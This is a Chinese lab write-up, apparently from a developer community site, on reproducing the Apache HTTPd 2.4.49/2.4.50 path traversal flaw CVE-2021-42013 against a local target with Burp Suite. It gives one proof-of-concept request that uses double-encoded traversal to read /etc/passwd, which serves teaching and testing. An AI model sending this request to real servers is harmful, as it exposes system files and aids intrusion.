AI 助理
备案控制台
开发者社区 安全 文章 正文

CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞

2022-12-15 381
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 影响版本Apache 2.4.49Apache 2.4.50当前描述发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。环境搭建可以查看我的上一篇文章https://developer.aliyun.com/article/11136

影响版本
Apache 2.4.49
Apache 2.4.50
当前描述

发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。
环境搭建可以查看我的上一篇文章
https://developer.aliyun.com/article/1113693?spm=a2c6h.26396819.creator-center.10.43283e1865liIz
靶机ip:192.168.0.11:8080
漏洞复现
我们在kali中对靶场进行抓包
BurpSuite抓到的包

image.png

Poc:

GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
把捕获的数据包发送到repeater
然后将坡村复制到数据包中然后发送
image.png
复现完成

文章标签:
Apache
安全
关键词:
Apache httpd
Apache漏洞
Apache rce漏洞
Apache rce
Apache httpd漏洞
郝奕程
目录
相关文章
流烟默
|
7月前
|
Linux 网络安全 Apache
Centos下操作Apache httpd
Centos下操作Apache httpd
流烟默
138 0
廖文
|
2月前
|
Linux 网络安全 Apache
CentOS 7.2配置Apache服务httpd(上)
CentOS 7.2配置Apache服务httpd(上)
廖文
260 1
廖文
|
2月前
|
Linux PHP Apache
CentOS 7.2配置Apache服务httpd(下)
CentOS 7.2配置Apache服务httpd(下)
廖文
52 1
李火火
|
安全 应用服务中间件 Apache
Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
李火火
792 1
泡沫o0
|
7月前
|
Shell Linux 网络安全
【Shell 命令集合 网络通讯 】Linux 管理Apache HTTP服务器 httpd命令 使用指南
【Shell 命令集合 网络通讯 】Linux 管理Apache HTTP服务器 httpd命令 使用指南
泡沫o0
104 0
李火火
|
安全 Java Shell
Apache Log4j2 远程代码执行漏洞
Apache Log4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。
李火火
110 2
李火火
|
SQL 安全 数据可视化
Apache Superset 未授权访问漏洞(CVE-2023-27524)
Apache Superset 存在未授权访问漏洞,攻击者可利用该漏洞验证和访问未经授权的资源。
李火火
275 1
Tom弹架构
|
安全 druid Java
【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程
近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
Tom弹架构
371 1
No8g攻城狮
|
存储 安全 Java
【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
No8g攻城狮
771 0
嘿嘿龙帅
|
缓存 网络协议 PHP
httpd和apache
httpd和apache
嘿嘿龙帅
78 0

热门文章

最新文章

  • 1
    apache htpasswd命令
  • 2
    Apache Dubbo 被曝出“高危”远程代码执行漏洞
  • 3
    rhel6.4 with R12.1.3 Apache启动报错 libdb-4.3.so不存在
  • 4
    发布Apache Hadoop 2.6.0——异构存储,长时间运行的服务与滚动升级支持
  • 5
    Apache + Tomcat 配置负载均衡
  • 6
    从零开始玩转JMX(四)——Apache Commons Modeler & Dynamic MBean
  • 7
    通过Apache PDFBox将pdf与图片互相转换以及合并与拆分pdf
  • 8
    apache支持php
  • 9
    Apache源码安装
  • 10
    RedHatAS4下Apache2+MySQL+Php+Tomcat整合及虚拟主机配置
  • 1
    从离线到实时:无锡锡商银行基于 Apache Doris 的数据仓库演进实践
    65394
  • 2
    Centos7 安装Apache
    102
  • 3
    在STS里使用Gradle编译Apache POI5.0.0
    64
  • 4
    数据猎手:使用Java和Apache HttpComponents库下载Facebook图像
    89
  • 5
    Apache服务器配置与优化指南
    408
  • 6
    Golang深入浅出之-Go语言中的分布式计算框架Apache Beam
    247
  • 7
    Linux _ apache服务器部署 不同域名—访问不同网站(多网站)
    170
  • 8
    查询提速11倍、资源节省70%,阿里云数据库内核版 Apache Doris 在网易日志和时序场景的实践
    53220
  • 9
    Spring BeanUtils与Apache BeanUtils提供基本属性复制,适用于简单需求
    73
  • 10
    如何在win系统部署Apache服务并实现无公网ip远程访问
    85

    • 相关课程

    更多
  • Apache RocketMQ:如何从互联网时代演进到云
  • Apache Flink 入门到实战 - Flink开源社区出品
  • Apache Flink 入门

    • 相关电子书

    更多
  • Apache Flink技术进阶
  • Apache Spark: Cloud and On-Prem
  • Hybrid Cloud and Apache Spark

    • 推荐镜像

    更多
  • apache
  • packman
  • CPAN
    • 下一篇
    阿里云无影云电脑免费试用,最长可试用3个月